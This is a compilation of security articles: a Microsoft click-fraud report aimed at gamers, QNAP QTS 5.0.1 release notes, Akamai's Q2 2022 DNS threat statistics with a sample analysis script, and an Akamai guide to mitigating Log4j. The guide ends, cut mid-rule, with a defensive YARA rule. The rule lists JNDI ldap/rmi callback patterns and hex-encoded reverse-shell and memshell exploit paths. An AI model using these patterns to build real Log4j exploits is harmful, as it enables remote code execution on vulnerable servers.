Microsoft Warns of Large-Scale Click Fraud Campaign Targeting Gamers

Microsoft said it’s tracking an ongoing large-scale click fraud campaign targeting gamers by means of stealthily deployed browser extensions on compromised systems.

“[The] attackers monetize clicks generated by a browser node-webkit or malicious browser extension secretly installed on devices,” Microsoft Security Intelligence said in a sequence of tweets over the weekend.

The tech giant’s cybersecurity division is tracking the developing threat cluster under the name DEV-0796.


Attack chains mounted by the adversary commence with an ISO file that’s downloaded onto a victim’s machine upon clicking on a malicious ad or comments on YouTube. The ISO file, when opened, is designed to install a browser node-webkit (aka NW.js) or rogue browser extension.


It’s worth noting that the ISO file masquerades as hacks and cheats for the Krunker first-person shooter game. Cheats are programs that help gamers gain an added advantage beyond the available capabilities during gameplay.

Also used in the attacks are DMG files, which are Apple Disk Image files primarily used to distribute software on macOS, indicating that the threat actors are targeting multiple operating systems.


The findings arrive as Kaspersky disclosed details of another campaign that lures gamers looking for cheats on YouTube into downloading self-propagating malware capable of installing crypto miners and other information stealers.

“Malware and unwanted software distributed as cheat programs stand out as a particular threat to gamers’ security, especially for those who are keen on popular game series,” the Russian cybersecurity firm said in a recent report.

Source :
https://thehackernews.com/2022/09/microsoft-warns-of-large-scale-click.html

Qnap QTS 5.0.1.2145 build 20220903

2022-09-15

Applicable Models

  • HS-251+,S2
  • QMiroPlus-201W
  • Mustang-F100,Mustang-V100,Mustang-200-i7-1T-32G-R10,Mustang-200-i5-1T-32G-R10,Mustang-200-C-8G-R10,Mustang-200
  • QBoat Sunny
  • QGD-1600P
  • QGD-1602P
  • QGD-3014-16PT
  • TS-453S Pro,TS-853S Pro
  • TS-531P
  • TS-216,TS-416
  • TS-128A,TS-228A,TS-212P3,TS-130,D1 Rev-B
  • TS-231P3,TS-431P3
  • TS-231P2,TS-431P2
  • TS-831X,TS-531X,TS-431X,TS-431X2,TS-431X3,TS-431KX
  • TS-431XU,TS-831XU,TS-1231XU,TS-431XU-RP,TS-831XU-RP,TS-1231XU-RP,TS-431XeU
  • TS-932X,TS-832X,TS-332X,TS-532X,TS-932PX,TS-832PX
  • TS-432XU-RP,TS-432XU,TS-832XU-RP,TS-832XU,TS-1232XU-RP,TS-1232XU,TS-432PXU,TS-432PXU-RP,TS-832PXU,TS-832PXU-RP,TS-1232PXU,TS-1232PXU-RP
  • TS-133,TS-233,TS-433
  • TS-1635
  • TS-1635AX
  • TS-435XeU
  • TS-231+,TS-431+,TS-131P,TS-231P,TS-431P,TS-131K,TS-231K,TS-431K,D2,D4,D4 Rev-B
  • TS-251,TS-451,TS-651,TS-851,TS-451S,TS-251+,TS-451+,TS-351,D2 Pro Rev-B,D4 Pro Rev-B
  • TS-251A,TS-451A,D2 Pro,D4 Pro
  • TS-251B
  • TS-451DeU,TS-453DU,TS-453DU-RP,TS-853DU-RP,TS-1253DU-RP
  • TS-451U
  • TS-253 Pro,TS-453 Pro,TS-653 Pro,TS-853 Pro,TS-453mini,IS-453S
  • TS-453Bmini,TS-253B,TS-453B,TS-653B,TS-253Be,TS-453Be,TS-453BT3
  • TS-853BU,TS-853BU-RP,TS-1253BU,TS-1253BU-RP,TS-453BU,TS-453BU-RP
  • HS-453DX,TBS-453DX,TS-251D,TS-253D,TS-653D,TS-453D,TS-451D,TS-453Dmini,TS-451D2
  • TBS-453A,TS-253A,TS-453A,TS-653A,TS-853A,D6 Pro,D8 Pro
  • TS-453U,TS-853U,TS-1253U,TS-453U-RP,TS-853U-RP,TS-1253U-RP,R4
  • TVS-463,TVS-663,TVS-863,TVS-863+,TS-563,TS-963X,TS-963N
  • TS-463U,TS-463U-RP,TS-863U,TS-863U-RP,TS-1263U,TS-1263U-RP,TS-463XU,TS-463XU-RP,TS-863XU,TS-863XU-RP,TS-1263XU,TS-1263XU-RP
  • TS-564,HS-264,TBS-464,TS-262C,TS-462C,TS-264C,TS-464C,TS-364,TS-464,TS-664
  • TS-464U,TS-464U-RP,TS-1264U-RP,TS-464eU,TS-864eU,TS-864eU-RP
  • TVS-471,TVS-671,TVS-871,TVS-871T
  • TVS-871U-RP,TVS-1271U-RP,TVS-471U-RP,TVS-471U,R8
  • TVS-672N,TVS-872N,TVS-872X,TVS-672X,TVS-472X,TVS-472XT,TVS-672XT,TVS-872XT
  • TVS-872XU,TVS-872XU-RP,TVS-1272XU-RP,TVS-1672XU-RP,TVS-2472XU-RP,TVS-972XU,TVS-972XU-RP
  • TVS-473,TVS-673,TVS-873,TVS-473e,TVS-673e,TVS-873e
  • TS-h973AX,TS-473A,TS-673A,TS-873A
  • TS-873AU,TS-873AU-RP,TS-1273AU-RP,TS-1673AU-RP,TS-873AeU,TS-873AeU-RP
  • TS-873U,TS-1273U,TS-1673U,TS-873U-RP,TS-1273U-RP,TS-1673U-RP
  • TVS-675
  • TVS-h875U,TVS-h875U-RP,TVS-h1275U-RP,TVS-h1675U-RP
  • TS-1277,TS-877,TS-677,TS-1677X
  • TS-877XU,TS-877XU-RP,TS-1277XU-RP,TS-1677XU-RP,TS-2477XU-RP,TS-977XU-RP,TS-977XU,TS-h1277XU-RP,TS-h977XU-RP,TS-h1677XU-RP,TS-h2477XU-RP
  • TS-EC880 Pro,TS-EC1080 Pro,TVS-EC880,TVS-EC1080,TVS-EC1080+
  • TS-EC880U,TS-EC1280U,TS-EC1680U,TS-EC2480U R2,TVS-EC1280U-SAS-RP R2,TVS-EC1580MU-SAS-RP R2,TVS-EC1680U-SAS-RP R2,TVS-EC2480U-SAS-RP R2,TS-EC2480U,TS-EC880U R2,TS-EC1280U R2,TS-EC1680U R2,TVS-EC1280U-SAS-RP,TVS-EC1580MU-SAS-RP,TVS-EC1680U-SAS-RP,TVS-EC2480U-SAS-RP,R12,R16,R24
  • TVS-682,TVS-882,TVS-1282,TVS-882BR,TVS-882T,TVS-1282T,TVS-682T,TVS-1282T3,TVS-882BRT3
  • TVS-1582TU
  • TS-883XU,TS-883XU-RP,TS-1283XU-RP,TS-1683XU-RP,TS-983XU,TS-983XU-RP,TS-2483XU-RP,TS-h1283XU-RP,TS-h2483XU-RP,TS-h1683XU-RP
  • TS-1685,TS-h886,TS-h686
  • TES-3085U,TES-1885U,TS-1886XU-RP,TS-h1886XU-RP,TS-h1886XU-RP R2
  • TS-2888X,TVS-h1688X,TVS-h1288X
  • TS-h3088XU-RP
  • TDS-16489U
  • TS-h2490FU,TS-h1090FU
  • TS-328,TS-428,TS-230,D2 Rev-B
  • TS-551
  • TS-473,TS-673,TS-873
  • TVS-951X,TVS-951N
  • GM-1000,TNS-h1083X,TNS-h1083X (A Side),TNS-h1083X (B Side)
  • TS-i410X, TS-410E
  • TS-253E,TS-453E
  • TS-h1290FX
  • TVS-882ST,TVS-882ST3
  • TS-h987XU-RP,TS-h1887XU-RP,TS-h2287XU-RP,TS-h3087XU-RP
  • TVS-h474,TVS-h674,TVS-h874


Important Notes

  • Out-of-the-box QTS 5.0.1 automatically installs security updates by default. Nevertheless, if you update the firmware from QTS 5.0.0 to 5.0.1, QTS will keep your existing firmware update settings. We recommend checking your firmware update settings in Control Panel > Firmware Update.
  • Removed support for the following developer tools: Node.js v4, Node.js v6, Node.js v8, and Ruby on Rails.
  • Removed support for the following apps or tools: Mono, Perl, and AlarmClock. We recommend running these apps or tools using Container Station if needed.
  • When a release candidate has proven to be stable enough for public use, we name this release candidate as an official release. You will not be notified again for official firmware update if you have already updated your system to this release candidate.

New Features

Control Panel
  • QTS now supports access protection settings for RTRR and Rsync protocols in Control Panel > System > Security.
  • Administrators can now enforce 2-step verification on specific users or groups and then check their current verification status. After this enforcement, selected users must complete 2-step verification setup before proceeding to other operations.
  • To ensure device security, you can now choose to disable USB ports to block all USB devices or only USB storage devices.
Desktop & Login
  • You can now configure the desktop icon size and font size in Desktop > Task Bar > Options > Wallpaper.
File Station
  • You can now share a shared folder via a share link.
Network & Virtual Switch
  • Network & Virtual Switch now displays MTU (Maximum Transmission Unit) values for network interfaces.
SAMBA
  • QTS now supports Microsoft Windows Search Protocol. This allows you to perform quick searches for files and folders in NAS shared folders mounted on Windows 10 via SMB.
Storage & Snapshots
  • Storage & Snapshots now displays topology diagrams for SAS JBOD expansion enclosures to help visualize the arrangement of your storage devices.
  • To ensure the availability of your data, Storage & Snapshots now supports “Replace & Detach”, which allows you to copy data from a faulty disk to a spare disk and then safely detach the faulty disk.
  • You can now use exFAT on ARM-based models without purchasing an exFAT license. Note that we have already added this support for x86-based models in an earlier update.
  • Added support for TCG-Enterprise SEDs. Storage & Snapshots can now display SED types.
  • Snapshot Replica now supports 2-step verification.
  • You can now specify a snapshot deletion policy in Storage & Snapshots > Global Settings.

Enhancement

Control Panel
  • Added an option to force users to change their password upon their first login.
  • Added the following features in Control Panel to optimize the mechanism and workflow of firmware updates:
    • Merged live update settings and auto update settings into a single user interface.
    • Enhanced notifications for firmware updates. Users can choose to postpone or cancel updates before the scheduled update time.
    • Introduced a new update type: important security updates. We recommend selecting this update type in auto update settings to ensure your device security.
  • QTS now displays a warning message in Control Panel > System > Hardware > Hardware Resources when you select a graphics card installed on a PCIe slot that does not support PCIe passthrough.
  • When importing users, you can now choose to require imported users to change their password upon their first login.
  • Shortened the waiting period for auto firmware updates. QTS now starts an auto update within only one hour from the scheduled time if a new firmware version is available for your device.
  • Administrators can now choose to receive notifications upon login if a recommended firmware update is available. (This feature is enabled by default).
  • The default UPS policy is now set to “auto-protection mode” after NAS initialization.
  • You can now create a one-time power schedule.
  • QTS now provides an option in Control Panel to disable the power button. This prevents unexpected shutdown when users press the power button by accident.
  • To prevent malicious usernames and to ensure device security, QTS no longer allows usernames that contain the following characters: { } $ and the space character.
File Station
  • File Station can now convert Apple iWork files to Microsoft Office formats with CloudConvert API v2.
  • Optimized the results of file name sorting for all languages. This helps deliver more consistent sorting results.
  • File Station now provides more information for background tasks to help you understand the detail, status, and progress of each task.
  • Share links now display file thumbnails and allow you to select and download multiple files at the same time. We have also enhanced the UI design to improve your file sharing experience.
Network & Virtual Switch
  • Upgraded jQuery to 3.5.1.
  • Improved the information for the system default gateway and NCSI (Network Connectivity Status Indicator) in Network & Virtual Switch to better explain their behaviors.
  • The TS-x77XU and TS-x83XU models can now update firmware for their network interface cards via Advanced Network Driver.
PHP System Module
  • Upgraded the built-in PHP version to 7.4.20.
SAMBA
  • Users can now enable SMB signing for NAS devices that do not join a domain. To enable this setting, go to Control Panel > Network & File Services > Win/Mac/NFS/WebDAV > Microsoft Networking > Advanced Options.
  • To prevent malware and ransomware from exploiting SMB v1 vulnerabilities, QTS now automatically sets the lowest SMB version to SMB v2 if your lowest SMB version is SMB v1 before this firmware update.
Storage & Snapshots
  • Updated Seagate IronWolf Health Management (IHM) to 2.1.1 to add support for the following drive models: IronWolf 525 SSD 2TB(ZP2000NM30002), IronWolf 525 SSD 1TB(ZP1000NM30002), IronWolf 525 SSD 500GB(ZP500NM30002), IronWolf 16TB(ST16000VN001), IronWolf 14TB(ST14000VN0008), IronWolf Pro 20TB(ST20000NE000), IronWolf 18TB(ST18000VN000), IronWolf 4TB(ST4000VN006).
  • Storage & Snapshots now supports zooming in on hardware model drawings to display component details.
  • Improved the user interface of Snapshot Replica to further enhance usability and user experience.
  • Storage & Snapshots now also displays Snapshot Replica information in Overview > Volume/LUN.

Fixed Issues

  • Fixed an issue where user storage quota would be reset to the default value after users restarted the NAS.

Known Issues

  • QTS and QuTS hero with newer kernel versions do not support ATTO Fibre Channel adapters. If you have already installed an ATTO Fibre Channel adapter on your device, we do not recommend updating the firmware to QTS 5.0.1 or QuTS hero h5.0.1 for the time being.
  • Thunderbolt connection between the NAS and Mac sometimes cannot automatically resume after users restart the NAS.
  • Users cannot connect to the destination NAS of a Snapshot Replica job if their usernames contain a space.
  • After waking up from sleep, the TS-x51 and TS-x53 models cannot detect external drives that do not support sleep mode.
  • Network connection issues may occur when users add both 10 GbE ports of the QXG-10G2SF-CX4 network expansion card to a virtual switch.
  • Users sometimes cannot switch between different FEC (Forward Error Correction) modes for the QXG-25G2SF-CX6LX network expansion card.
  • On some earlier NAS models with ARM processors, heavy I/O operations may cause network connection issues for the QNA-UC5G1T USB-to-Ethernet adapter.

Other Changes

App Center
  • In App Center, the option “Allow installation of applications without a valid digital signature” is now disabled by default after firmware update.
Control Panel
  • Removed certain device information from the login screen to enhance device security.
  • To ensure device security, the “admin” account cannot use the default password (the MAC address of the first network adapter) when changing the password.
Desktop & Login
  • Instead of using the generic alias “appuser”, QuLog Center and Desktop Dashboard now display actual usernames when users access system resources and services via a client app.
  • To enhance device security, the system now asks the “admin” user to change the password when the user logs in with the default password (the MAC address of the first network adapter).
License
  • You no longer need a license to operate QuTScloud installed in Virtualization Station. Note that License Center 1.7.5 (or later) is required for this change.
Storage & Snapshots
  • For a more intuitive workflow, Storage & Snapshots now shows various options (such as “Remove” and “Expand”) on the “Action” menu in Pool/Volume Management.
  • Storage & Snapshots now provides clearer information for the results of IronWolf Health Management (IHM) tests. This allows you to easily check the health of your IronWolf drives.
  • You can now quickly identify and repair volumes that may have potential issues after a power outage or an abnormal shutdown. In Storage & Snapshots > Overview, we now add a link that allows you to perform a file system check on such volumes.
  • VJBOD currently does not support encrypted LUNs.
  • Adjusted some settings in the Volume Creation Wizard to enhance user experience. Thin volume is now the default volume type for volume creation.

Source :
https://www.qnap.com/it-it/release-notes/qts/5.0.1.2145/20220903?ref=nas_product

Akamai’s Insights on DNS in Q2 2022

by Or Katz and Jim Black
Data analysis by Gal Kochner and Moshe Cohen

Executive summary

  • Akamai researchers have analyzed malicious DNS traffic from millions of devices to determine how corporate and personal devices are interacting with malicious domains, including phishing attacks, malware, ransomware, and command and control (C2).
  • Akamai researchers saw that 12.3% of devices used by home and corporate users communicated at least once to domains associated with malware or ransomware.
  • 63% of those users’ devices communicated with malware or ransomware domains, 32% communicated with phishing domains, and 5% communicated with C2 domains.
  • Digging further into phishing attacks, researchers found that users of financial services and high tech are the most frequent targets of phishing campaigns, with 47% and 36% of the victims, respectively.
  • Consumer accounts are the most affected by phishing, with 80.7% of the attack campaigns.
  • Tracking 290 different phishing toolkits being reused in the wild, and counting the number of distinct days each kit was reused over Q2 2022, shows that 1.9% of the tracked kits were reactivated on at least 72 days. In addition, 49.6% of the kits were reused for at least five days, demonstrating how many users are being revictimized multiple times. This shows how realistic-looking and dangerous these kits can be, even to knowledgeable users. 
  • The most used phishing toolkit in Q2 2022 (Kr3pto, a phishing campaign that targeted banking customers in the United Kingdom, which evades multi-factor authentication [MFA]) was hosted on more than 500 distinct domains.

Introduction

“It’s always DNS.” Although that is a bit of a tongue-in-cheek phrase in our industry, DNS can give us a lot of information about the threat landscape that exists today. By analyzing information from Akamai’s massive infrastructure, we are able to gain some significant insights on how the internet behaves. In this blog, we will explore these insights into traffic patterns, and how they affect people on the other end of the internet connection. 

Akamai traffic insights

Attacks by category

Based on Akamai’s range of visibility across different industries and geographies, we can see that 12.3% of protected devices attempted to reach out to domains that were associated with malware at least once during Q2 2022. This indicates that these devices might have been compromised. On the phishing and C2 front, we can see that 6.2% of devices accessed phishing domains and 0.8% of the devices accessed C2-associated domains. Although these numbers may seem insignificant, the scale here is in the millions of devices. When this is considered, along with the knowledge that C2 is the most malignant of threats, these numbers are not only significant, they’re cardinal.

Comparing 2022 Q2 results with 2022 Q1 results (Figure 1), we can see a minor increase in all categories in Q2. We attribute those increases to seasonal changes that are not associated with a significant change in the threat landscape.

Fig. 1: Devices exposed to threats — Q1 vs. Q2

In Figure 2, we can see that of the 12.3% potentially compromised devices, 63% were exposed to threats associated with malware activity, 32% with phishing, and 5% with C2. Access to malware-associated domains does not guarantee that these devices were actually compromised, but provides a strong indication of increased potential risk if the threat wasn’t properly mitigated. However, access to C2-associated domains indicates that the device is most likely compromised and is communicating with the C2 server. This can often explain why the incidence of C2 is lower when compared with malware numbers.

Fig. 2: Potentially compromised devices by category
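The two figures above rest on a per-device computation: whether a device resolved any listed domain at least once, and which category it touched. The following is an added example (not Akamai's code or data) that reproduces that computation over a constructed resolver log and a constructed, categorised domain list, labelling each exposed device by its worst category so that a C2 contact outranks malware, which outranks phishing; it also matches subdomains of a listed parent and normalises case and trailing dots.

```python
"""Added example: per-device exposure metrics from DNS resolver logs.

Constructed inputs only: log lines are "<timestamp> <device_id> <queried_name>",
and the threat list maps a domain to one of malware / phishing / c2.
"""
from collections import Counter

# Worst-category ranking: the blog treats C2 contact as the strongest
# indicator of compromise, malware contact as an indication of risk,
# and phishing contact as the weakest.
SEVERITY = {"c2": 3, "malware": 2, "phishing": 1}

THREAT_DOMAINS = {  # constructed sample domains, not real indicators
    "update-check.example-malware.test": "malware",
    "secure-login.example-bank.test": "phishing",
    "beacon.example-c2.test": "c2",
}

SAMPLE_LOG = """\
2022-06-01T10:00:01Z dev-001 www.example.com
2022-06-01T10:00:02Z dev-001 cdn.update-check.example-malware.test
2022-06-01T10:00:03Z dev-002 secure-login.example-bank.test
2022-06-01T10:00:04Z dev-003 www.example.org
2022-06-01T10:00:05Z dev-004 beacon.example-c2.test
2022-06-01T10:00:06Z dev-004 update-check.example-malware.test
2022-06-01T10:00:07Z dev-005 cdn.example.net
2022-06-01T10:00:08Z dev-006 mail.example.net
2022-06-01T10:00:09Z dev-007 Secure-Login.example-bank.test.
2022-06-01T10:00:10Z dev-008 secure-login.example-bank.test
this line is malformed and is skipped
"""


def normalize(name: str) -> str:
    """Lower-case the name and drop a trailing root dot so lookups are exact."""
    return name.strip().lower().rstrip(".")


def classify_domain(name: str, threat_domains=THREAT_DOMAINS):
    """Return the category of a queried name, matching the name itself or any
    parent domain on the list (a.b.bad.test matches bad.test); None if clean."""
    labels = normalize(name).split(".")
    for i in range(len(labels)):
        category = threat_domains.get(".".join(labels[i:]))
        if category:
            return category
    return None


def parse_log(text: str):
    """Yield (device_id, queried_name) for every well-formed log line."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # tolerate malformed lines instead of aborting the run
        yield parts[1], parts[2]


def device_exposure(text: str):
    """Map every device seen in the log to the set of categories it touched."""
    seen = {}
    for device, name in parse_log(text):
        categories = seen.setdefault(device, set())  # clean devices count too
        category = classify_domain(name)
        if category:
            categories.add(category)
    return seen


def pct(numerator: int, denominator: int) -> float:
    return round(100.0 * numerator / denominator, 1) if denominator else 0.0


def summarize(text: str):
    """Exposure share of all devices, plus breakdowns by worst category
    (as in Fig. 2) and by any contact (as in Fig. 1)."""
    exposure = device_exposure(text)
    total = len(exposure)
    exposed = {d: cats for d, cats in exposure.items() if cats}
    worst = Counter(max(cats, key=SEVERITY.__getitem__) for cats in exposed.values())
    any_contact = Counter(c for cats in exposed.values() for c in cats)
    return {
        "total_devices": total,
        "exposed_pct": pct(len(exposed), total),
        "worst_category_pct": {c: pct(worst[c], len(exposed)) for c in SEVERITY},
        "any_contact_pct": {c: pct(any_contact[c], total) for c in SEVERITY},
    }


if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
```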

Phishing attack campaigns 

By looking into the brands that are being abused and mimicked by phishing scams in Q2 2022, categorized by brand industry and number of victims, we can see that high tech and financial brands led with 36% and 47%, respectively (Figure 3). These leading phishing industry categories are consistent with Q1 2022 results, in which high tech and financial brands were the leading categories, with 32% and 31%, respectively. 

Fig. 3: Phishing victims and phishing campaigns by abused brands

When taking a different view on the phishing landscape (targeted industries, counted by the number of attack campaigns launched over Q2 2022), we can see that high tech and financial brands are still leading, with 36% and 41%, respectively (Figure 3). The correlation between leading targeted brands when it comes to number of attacks and number of victims is evidence that threat actors’ efforts and resources are, unfortunately, effectively working to achieve their desired outcome.

Akamai’s research does not have any visibility into the distribution channels used to deliver the monitored phishing attacks that led to victims clicking on a malicious link and ending up on the phishing landing page. Yet the strong correlation between different brand segments by number of attack campaigns and the number of victims seems to indicate that the volume of attacks is effective and leads to a similar trend in the number of victims. The correlation might also indicate that the distribution channels used have minimal effect on attack outcome, and it is all about the volume of attacks that lead to the desired success rates.

Taking a closer look at phishing attacks by categorization of attack campaigns (consumer vs. business-targeted accounts), we can see that consumer attacks are the most dominant, with 80.7% of the attack campaigns (Figure 4). This domination is driven by the massive demand for consumers’ compromised accounts in dark markets that are then used to launch fraud-related second-phase attacks. However, even with only 19.3% of the attack campaigns, attacks against business accounts should not be considered marginal, as these kinds of attacks are usually more targeted and have greater potential for significant damage. Attacks that target business accounts may lead to a company’s network being compromised with malware or ransomware, or to confidential information being leaked. An attack that begins with an employee clicking a link in a phishing email can end up with the business suffering significant financial and reputational damages.

Fig. 4: Phishing targeted accounts — consumers vs. business

Phishing toolkits 

Phishing attacks are an extremely common vector that have been used for many years. The potential impacts and risks involved are well-known to most internet users. However, phishing is still a highly relevant and dangerous attack vector that affects thousands of people and businesses daily. Research conducted by Akamai explains some of the reasons for this phenomenon, and focuses on the phishing toolkits and their role in making phishing attacks effective and relevant. 

Phishing toolkits enable rapid and easy creation of fake websites that mimic known brands. Phishing toolkits enable even non–technically gifted scammers to run phishing scams, and in many cases are being used to create distributed and large-scale attack campaigns. The low cost and availability of these toolkits explains the increasing numbers of phishing attacks that have been seen in the past few years. 

According to Akamai’s research that tracked 290 different phishing toolkits being used in the wild, 1.9% of the tracked kits were reused on at least 72 distinct days over Q2 2022 (Figure 5). Further, 49.6% of the kits were reused for at least five days, and when looking into all the tracked kits, we can see that all of them were reused no fewer than three distinct days over Q2 2022.

Fig. 5: Phishing toolkits by number of reused days Q2 2022

The numbers showing the heavy reuse phenomenon of the observed phishing kits shed some light on the phishing threat landscape and the scale involved, creating an overwhelming challenge to defenders. Behind the reuse of phishing kits are factories and economic forces that drive the phishing landscape. Those forces include developers who create phishing kits that mimic known brands, later to be sold or shared among threat actors to be reused over and over again with very minimal effort.

Further analysis on the most reused kits in Q2 2022, counting the number of different domains used to deliver each kit, shows that the Kr3pto toolkit was the one most frequently used and was associated with more than 500 domains (Figure 6). The tracked kits are labeled by the name of the brand being abused or by a generic name representing the kit developer signature or kit functionality.

In the case of Kr3pto, the actor behind the phishing kit is a developer who builds and sells unique kits that target financial institutions and other brands. In some cases, these kits target financial firms in the United Kingdom, and they bypass MFA. This evidence also shows that this phishing kit that was initially created more than three years ago is still highly active and effective and being used intensively in the wild.

Fig. 6: Top 10 reused phishing toolkits

The phishing economy is growing, kits are becoming easier to develop and deploy, and the web is full of abandoned, ready-to-be-abused websites and vulnerable servers and services. Criminals capitalize on these weaknesses to establish a foothold that enables them to victimize thousands of people and businesses daily.

The growing industrial nature of phishing kit development and sales (in which new kits are developed and released within hours) and the clear split between creators and users means this threat isn’t going anywhere anytime soon. The threat posed by phishing factories isn’t just focused on the victims who risk having valuable accounts compromised and their personal information sold to criminals — phishing is also a threat to brands and their stakeholders.

The life span of a typical phishing domain is measured in hours, not days. Yet new techniques and developments by the phishing kit creators are expanding these life spans little by little, and it’s enough to keep the victims coming and the phishing economy moving. 

Summary

This type of research is necessary in the fight to keep our customers safer online. We will continue to monitor these threats and report on them to keep the industry informed.

The best way to stay up to date on this and other research pieces from the Akamai team is to follow Akamai Security Research on Twitter.

Source :
https://www.akamai.com/blog/security-research/q2-dns-akamai-insights

Mitigating Log4j Abuse Using Akamai Guardicore Segmentation

Executive summary

A critical remote code-execution vulnerability (CVE-2021-44228) has been publicly disclosed in Log4j, an open-source logging utility that’s used widely in applications, including many utilized by large enterprise organizations.

The vulnerability allows threat actors to exfiltrate information from, and execute malicious code on, systems running applications that utilize the library by manipulating log messages. There already are reports of servers performing internet-wide scans in attempts to locate vulnerable servers, and our threat intelligence teams are seeing attempts to exploit this vulnerability at alarming volumes. Log4j is incorporated into many popular frameworks and many Java applications, making the impact widespread.

Akamai Guardicore Segmentation is well positioned to address this vulnerability in different ways. It’s highly recommended that organizations update Log4j to its latest version, 2.16.0. Due to the rapidly escalating nature of this vulnerability, Akamai teams will continue to develop and deploy mitigation measures in order to support our customers.

As a follow-up to Akamai’s recent post, we wanted to provide more detail on how organizations can leverage Akamai Guardicore Segmentation features to help address Log4j exposure.

Log4j vulnerability: scope and impact

Log4j is a Java-based open-source logging library. On December 9, 2021, a critical vulnerability involving unauthenticated remote code execution (CVE-2021-44228) in Log4j was reported, causing concern due to how commonly Log4j is used. In addition to being used directly in a large multitude of applications, Log4j is also incorporated into a host of popular frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink.

Although Akamai first observed exploit attempts on the Log4j vulnerability on December 9th, following the widespread publication of the incident, we are now seeing evidence suggesting it could have been around for months. Since widespread publication of the vulnerability, we have seen multiple variants seeking to exploit this vulnerability, at a sustained volume of attack traffic at around 2M exploit requests per hour. The speed at which the variants are evolving is unprecedented.

A compromised machine would allow a threat actor to remotely provide a set of commands which Log4j executes. An attacker would have the ability to run arbitrary commands inside a server. This can allow an attacker to compromise a vulnerable system – including those that might be secured deep inside of a network with no direct access to the internet.

Akamai’s security teams have been monitoring attackers attempting to use Log4j in recent days. Other than the increase in attempted exploitation, Akamai researchers are also seeing attackers using a multitude of tools and attack techniques to get vulnerable components to log malicious content, in order to get remote code execution. This is indicative of threat actors’ ability to exploit a new vulnerability, and the worse the vulnerability is, the quicker they will act.

Mitigating Log4j abuse using Akamai Guardicore Segmentation

Customers using Akamai Guardicore Segmentation can leverage its deep, process level visibility to identify vulnerable applications and potential security risks in the environment. They can then use it to enact precise control over network traffic in order to stop attempted attacks on vulnerable systems, without disruptions to normal business operations. 

Guardicore Hunt customers have their environments monitored and investigated continuously by a dedicated team of security researchers. Alerts on security risks and suggested mitigation steps are immediately sent.

If you’d like to hear more about Akamai Guardicore Segmentation, read more or contact us.

What’s under threat: identify vulnerable Java processes and Log4j abuse

In order to protect against potential Log4j abuse, it is necessary to first identify potentially exploitable processes. This requires deep visibility into network traffic at the process level, which is provided by the Reveal and Insight features of Akamai Guardicore Segmentation. Precise visibility into internet connections and traffic at the process level allows us to see clearly what mitigation steps need to be taken, and visibility tools with historical data are pivotal in helping to prevent disruption to business operations.

Identify internet-connected Java applications: using Reveal Explore Map, create a map for the previous week, and filter by Java applications (such as Tomcat, Elastic, or Logstash) and by applications that have connections to/from the internet. Using this map, you can now see which assets are under potential threat. While this won’t yet identify Log4j applications, it can give you an idea of which machines to prioritize in your mitigation process.

Create a historical map to analyze normal communication patterns: using Reveal Explore Map, create a historical map of previous weeks (excluding the time since Log4j was reported) to view and learn normal communication patterns. Use this information to identify legitimate communications, and respond without disrupting the business. For example, a historical map might indicate what network connections exist under normal circumstances, those could be allowed, while other connections blocked or alerted on. Additionally, compare and contrast with a more recent map to identify anomalies.

Use Reveal Explore Map to identify legitimate communications, and respond without disrupting the business.

Identify applications vulnerable to Log4j abuse: in the query section below, use Query 1 with Insight queries to identify assets that are running Java applications which have Log4j jar files in their directories. This query should return all Log4j packages in your environment, allowing you to assess and address any mitigation steps needed. To better prioritize exposed machines, cross-reference the information with the Reveal Explore Map described previously.

Note that this query identifies Log4j packages that exist in the Java process current working directory or sub-directories.

Detect potential exploitation attempts in Linux logs: run an Insight query using YARA signature rules (Query 2, provided below in the query section) to search for known Log4j IoCs in the logs of Linux machines. This can help you identify whether you’ve been attacked.

Note that a negative result does not necessarily mean that no attack exists, as this is only one of many indicators.

Stopping the attack: using Guardicore Segmentation to block malicious IoCs and attack vectors

It is imperative to be able to take action, once vulnerable applications have been identified. While patching is underway, Akamai Guardicore Segmentation offers a multitude of options for alerting on, stopping and preventing potential attacks. Critically, a solution with detailed and precise control over network communication and traffic is required to be able to surgically block or isolate attack vectors, with minimal to no disruption to normal business functions.

Automatically block IoCs with Threat Intelligence Firewall (TIFW) and DNS Security: Akamai security teams are working around the clock to identify IPs and domains used for Log4j exploitation. Customers who have these features turned on can expect a constantly updated list of IoCs to be blocked, preventing Log4j from being used to download malicious payloads. Note that TIFW can be set to alert or block; please ensure it’s configured correctly. DNS Security is available from V41 onwards. The IoCs are also available on the Guardicore Threat Intel Repository and Guardicore Reputation Service.

Fully quarantine compromised servers: if compromised machines are identified during your investigation, use Akamai Guardicore Segmentation to isolate attacked/vulnerable servers from the rest of your network. Leverage built-in templates to easily enable deployment of segmentation policy to mitigate attacks.

Block inbound and outbound traffic to vulnerable assets: as a precautionary measure, you may also choose to block traffic to all machines identified with an unpatched version of Log4j, until patching is completed. Using a historical map of network traffic can help you limit the impact on business operations.

Create block rules for outgoing traffic from Java applications to the internet: if necessary, all internet-connected Java applications revealed in previous steps can be blocked from accessing the internet, as an additional precaution, until patching is complete.

Search queries

Query 1: To identify assets that are running Java applications which also have a Log4j jar file under their directories, run the following Insight query:

This query identifies assets that are running Java applications, which also have a Log4j jar file under their directories.

Query 2: To detect potential exploitation attempts, run an Insight query using YARA signature rules (our thanks to Florian Roth who published the original rule): 

SELECT path, count FROM yara WHERE path LIKE '/var/log/%%' AND sigrule = "rule EXPL_Log4j_CallBackDomain_IOCs_Dec21_1 {
strings:
$xr1 = /\b(ldap|rmi):\/\/([a-z0-9\.]{1,16}\.bingsearchlib\.com|[a-z0-9\.]{1,40}\.interact\.sh|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}):[0-9]{2,5}\/([aZ]|ua|Exploit|callback|[0-9]{10}|http443useragent|http80useragent)\b/
condition:
1 of them
}
rule EXPL_JNDI_Exploit_Patterns_Dec21_1 {
strings:
$ = {22 2F 42 61 73 69 63 2F 43 6F 6D 6D 61 6E 64 2F 42 61 73 65 36 34 2F 22}
$ = {22 2F 42 61 73 69 63 2F 52 65 76 65 72 73 65 53 68 65 6C 6C 2F 22}
$ = {22 2F 42 61 73 69 63 2F 54 6F 6D 63 61 74 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 42 61 73 69 63 2F 4A 65 74 74 79 4D 65 6D 73 68 65 6C 6C 22}
